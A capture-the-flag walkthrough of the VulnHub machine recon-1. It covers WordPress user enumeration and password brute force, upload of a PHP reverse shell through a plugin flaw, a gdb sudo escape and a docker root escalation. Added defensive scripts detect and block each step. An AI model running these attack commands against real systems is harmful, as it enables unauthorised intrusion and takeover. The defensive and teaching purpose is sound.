Recon-1 walkthrough
Updated: May 25, 2020
In this article we are going to solve another boot2root challenge, recon-1. This is a beginner-level machine; we can download it from VulnHub.
Walkthrough
The first step is to find the IP address of the target machine using the command netdiscover -i wlan0.

Now, using the command nmap -A 192.168.43.240, we checked for open ports.

Only two ports are open, 80 and 22, so we decided to browse the HTTP service.

As the title suggests, this is a WordPress website, so we decided to run wpscan to enumerate usernames using the command:
wpscan --url http://192.168.43.240 --enumerate u

Here we found two users, so we decided to brute-force the password for both users so that we can log in to the admin panel of the WordPress website. Command used: wpscan --url http://192.168.43.240 -U recon,reconauthor -P /usr/share/wordlists/rockyou.txt

Now we open the URL http://192.168.43.240/wp-admin and log in as reconauthor with the password football7. After logging into the admin panel, we observe that we have no way to upload a shell as we do on other vulnerable machines, so we decided to run dirb to find more pages on the WordPress site using the command: dirb http://192.168.43.240
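Seen from the server side, the two wpscan steps above (username enumeration, then a wordlist run against wp-login.php) leave a recognisable trail in the access log. The following detection script is an added example, not part of the original walkthrough or of wpscan: it reads access-log lines in Apache/nginx combined format and flags clients that request author archives or the REST users endpoint (how usernames are enumerated) and clients that POST to wp-login.php or xmlrpc.php more than a threshold number of times. The log lines and the threshold of 20 are constructed for illustration.

```python
"""Detect WordPress user enumeration and login brute force in an access log.

Added example (not from the original walkthrough). Flags:
  * author-ID enumeration (?author=N, /wp-json/wp/v2/users), which is how
    wpscan --enumerate u discovers usernames, and
  * bursts of POST requests to wp-login.php or xmlrpc.php from one client,
    which is what a wordlist attack looks like server-side.
Thresholds and the sample log lines are constructed for illustration.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Apache/nginx "combined" log format: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Request patterns that reveal usernames (author archives, REST users endpoint).
ENUM_PATTERNS = (
    re.compile(r'[?&]author=\d+'),
    re.compile(r'/wp-json/wp/v2/users'),
    re.compile(r'/\?rest_route=/wp/v2/users'),
)
LOGIN_PATHS = ('/wp-login.php', '/xmlrpc.php')


@dataclass
class Findings:
    enumerators: set = field(default_factory=set)           # IPs probing usernames
    login_attempts: dict = field(default_factory=lambda: defaultdict(int))
    brute_forcers: set = field(default_factory=set)         # IPs over the POST threshold


def analyse(lines, login_threshold=20):
    """Return Findings for an iterable of access-log lines."""
    f = Findings()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, method, path = m['ip'], m['method'], m['path']
        if any(p.search(path) for p in ENUM_PATTERNS):
            f.enumerators.add(ip)
        if method == 'POST' and path.split('?')[0] in LOGIN_PATHS:
            f.login_attempts[ip] += 1
    f.brute_forcers = {ip for ip, n in f.login_attempts.items() if n >= login_threshold}
    return f


# Constructed sample: one client enumerates authors, then hammers wp-login.php;
# a second client logs in once, legitimately.
SAMPLE_LOG = (
    ['203.0.113.9 - - [25/May/2020:10:00:%02d +0000] "GET /?author=%d HTTP/1.1" 301 0' % (i, i)
     for i in range(1, 4)]
    + ['203.0.113.9 - - [25/May/2020:10:00:05 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 512']
    + ['203.0.113.9 - - [25/May/2020:10:01:%02d +0000] "POST /wp-login.php HTTP/1.1" 200 3100' % (i % 60)
       for i in range(25)]
    + ['198.51.100.4 - - [25/May/2020:10:02:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
       '198.51.100.4 - - [25/May/2020:10:02:01 +0000] "GET /wp-admin/ HTTP/1.1" 200 9000']
)

if __name__ == '__main__':
    result = analyse(SAMPLE_LOG)
    print('username enumeration from:', sorted(result.enumerators))
    print('login brute force from:', sorted(result.brute_forcers))
```

Run against a real log the only thing to tune is login_threshold; a site with many editors may need a higher value or a per-minute window. Blocking author archives (redirecting ?author=N) and rate-limiting wp-login.php are the corresponding mitigations for the two findings.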

We decided to open the URL /wp-content/uploads, and there we found two directories.

After exploring the 2020/ directory we failed to find anything useful, and the directory /articulate_uploads is also empty, so we are completely stuck here. Now we take the help of the internet, search for articulate_uploads and find a vulnerability. So we followed the steps mentioned in the exploit and made two files: one is the reverse shell we downloaded from pentestmonkey, saved as index.php, and the other is a file named index.html created with echo "<html>hello</html>" > index.html. Now we put these two files inside a zip file using the command: zip exp.zip index.php index.html

Now we follow the exploit and upload the zip file.

We followed these 3 steps to get a reverse shell on our local machine (don't forget to open the listener on the port you specified in the shell code; command used: nc -nvlp 1234).

The exploit is working, so now we trigger it by visiting the URL
192.168.43.240/wp-content/uploads/articulate_uploads/exp/index.php
Now we have a reverse shell as user www-data.
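The upload path above turns a plain file upload into remote code execution because the handler unpacks the archive into a directory the web server executes PHP from, so a zip carrying index.php becomes a web shell. The checker below is an added example, not the plugin's code or its vendor fix: it inspects every member of an uploaded zip before extraction and rejects server-executable file types, path traversal and absolute paths, accepting only the static file types a content package is expected to contain. The extension lists and the three sample archives are constructed.

```python
"""Validate an uploaded zip before extracting it into a web-served directory.

Added example, not part of the walkthrough or of the plugin it exploits. The
upload above works because the archive is unpacked under wp-content/uploads,
which the web server runs PHP from. This checker refuses archives that would
place server-executable files, traversal paths or absolute paths on disk.
Extension lists and sample archives are constructed for illustration.
"""
import io
import posixpath
import zipfile

# Extensions the web server would execute (or honour as config) rather than serve.
EXECUTABLE_EXTS = {'.php', '.php3', '.php4', '.php5', '.phtml', '.phar', '.htaccess'}
# What a legitimate static content package is expected to contain (assumed list).
ALLOWED_EXTS = {'.html', '.htm', '.js', '.css', '.json', '.xml', '.png', '.jpg',
                '.gif', '.svg', '.woff', '.mp3', '.mp4'}


class UnsafeArchive(ValueError):
    """Raised with a human-readable reason for the first rejected member."""


def _ext(name):
    base = posixpath.basename(name)
    if base.startswith('.') and base.count('.') == 1:
        return base.lower()             # dotfiles such as .htaccess
    return posixpath.splitext(base)[1].lower()


def check_zip_members(zf):
    """Raise UnsafeArchive for the first member that must not reach the webroot."""
    for info in zf.infolist():
        name = info.filename.replace('\\', '/')
        if posixpath.isabs(name):
            raise UnsafeArchive(f'absolute path: {name}')
        if '..' in name.split('/'):
            raise UnsafeArchive(f'path traversal: {name}')
        if info.is_dir():
            continue
        ext = _ext(name)
        if ext in EXECUTABLE_EXTS:
            raise UnsafeArchive(f'server-executable file: {name}')
        if ext not in ALLOWED_EXTS:
            raise UnsafeArchive(f'unexpected file type: {name}')
    return True


def verdict(zip_bytes):
    """Return None if the archive is acceptable, else the rejection reason."""
    try:
        with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
            check_zip_members(zf)
    except UnsafeArchive as e:
        return str(e)
    return None


def safe_extract(zip_bytes, dest_dir):
    """Validate, then extract; returns the extracted member names."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        check_zip_members(zf)
        zf.extractall(dest_dir)
        return [i.filename for i in zf.infolist()]


def build_zip(members):
    """Constructed helper: build an in-memory zip from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed samples: a benign package, the index.php/index.html pair from the
# walkthrough (placeholder PHP, not a shell), and a traversal attempt.
BENIGN = build_zip({'story.html': b'<html>hello</html>', 'js/player.js': b'// player'})
SHELL = build_zip({'index.php': b'<?php echo 1; ?>', 'index.html': b'<html>hello</html>'})
TRAVERSAL = build_zip({'../../wp-config.php': b'x'})

if __name__ == '__main__':
    for label, data in (('benign', BENIGN), ('shell', SHELL), ('traversal', TRAVERSAL)):
        print(label, '->', verdict(data) or 'accepted')
```

Member validation is the first layer; the second, which does not depend on the plugin getting it right, is web-server configuration that refuses to execute PHP under the uploads directory at all, so that an index.php which does slip through is served as text rather than run.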

Now, without wasting time, we decided to check sudo privileges using the command: sudo -l

And this is what we want: now we can use /usr/bin/gdb for privilege escalation and get a shell as user offensivehack.
sudo -u offensivehack /usr/bin/gdb -nx -exec '!bash'
!bash
whoami
python3 -c'import pty;pty.spawn("/bin/bash")'

Now if we check the groups using the command groups, we can see that docker is present, so we can use docker to get root access as shown in the image.

Command used:
groups
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
We get root access, and this completes our challenge!
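Both escalation steps on this box (sudo allowing gdb as offensivehack, and offensivehack being in the docker group) are misconfigurations an administrator can find before anyone else does. The audit script below is an added example, not part of the walkthrough: it parses captured sudo -l output and /etc/group contents and reports sudo rules that grant a shell-capable binary to another user, and members of groups whose membership is root-equivalent. The sample sudo -l text and group file are constructed to resemble the target machine, and the lists of shell-capable binaries and root-equivalent groups are assumptions, not an exhaustive reference.

```python
"""Audit a host for the two privilege-escalation paths used in the walkthrough.

Added example, not from the original post. Parses:
  * `sudo -l` output, reporting rules that allow a binary able to spawn a
    shell (gdb here, plus a few other well-known ones) as another user, and
  * /etc/group, reporting members of groups such as docker, whose members
    can mount the host filesystem into a container and so are root-equivalent.
The sample texts are constructed; the binary and group lists are assumptions.
"""
import re

# Binaries that can run arbitrary commands when allowed via sudo (short, assumed list).
SHELL_CAPABLE = {'gdb', 'vim', 'vi', 'less', 'more', 'find', 'awk', 'python',
                 'python3', 'perl', 'bash', 'sh', 'env', 'docker'}
# Groups whose membership is effectively root (assumed list).
ROOT_EQUIVALENT_GROUPS = {'docker', 'lxd', 'disk', 'sudo', 'wheel'}

# Matches sudo -l rule lines such as "    (offensivehack) NOPASSWD: /usr/bin/gdb"
SUDO_RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')


def risky_sudo_rules(sudo_l_output):
    """Return [(runas_user, binary, nopasswd)] for rules allowing a shell-capable binary."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue
        runas = m['runas'].split(':')[0].strip()     # "(user : group)" -> user
        nopasswd = 'NOPASSWD' in m['tags']
        for cmd in m['cmds'].split(','):
            cmd = cmd.strip()
            if not cmd:
                continue
            binary = cmd.split()[0]                   # drop any argument restriction
            name = binary.rsplit('/', 1)[-1]
            if binary == 'ALL' or name in SHELL_CAPABLE:
                findings.append((runas, binary, nopasswd))
    return findings


def root_equivalent_members(etc_group_text):
    """Return {group: [members]} for root-equivalent groups that have members."""
    out = {}
    for line in etc_group_text.splitlines():
        parts = line.split(':')
        if len(parts) != 4:
            continue                                  # not a group:x:gid:members line
        group, members = parts[0], [m for m in parts[3].split(',') if m]
        if group in ROOT_EQUIVALENT_GROUPS and members:
            out[group] = members
    return out


# Constructed sample resembling the walkthrough's target (not real captured output).
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on recon:
    env_reset, mail_badpass

User www-data may run the following commands on recon:
    (offensivehack) NOPASSWD: /usr/bin/gdb
"""

SAMPLE_ETC_GROUP = """\
root:x:0:
sudo:x:27:
docker:x:999:offensivehack
www-data:x:33:
"""

if __name__ == '__main__':
    for runas, binary, nopasswd in risky_sudo_rules(SAMPLE_SUDO_L):
        print(f'sudo: {binary} runnable as {runas}' + (' without a password' if nopasswd else ''))
    for group, members in root_equivalent_members(SAMPLE_ETC_GROUP).items():
        print(f'group {group}: {", ".join(members)}')
```

Feed it real data with risky_sudo_rules(subprocess.run(['sudo', '-l'], ...).stdout) and root_equivalent_members(open('/etc/group').read()). A rule that names gdb (or any binary that can shell out) defeats the point of restricting sudo to one command, and a docker group member should be treated as an administrator in any access review.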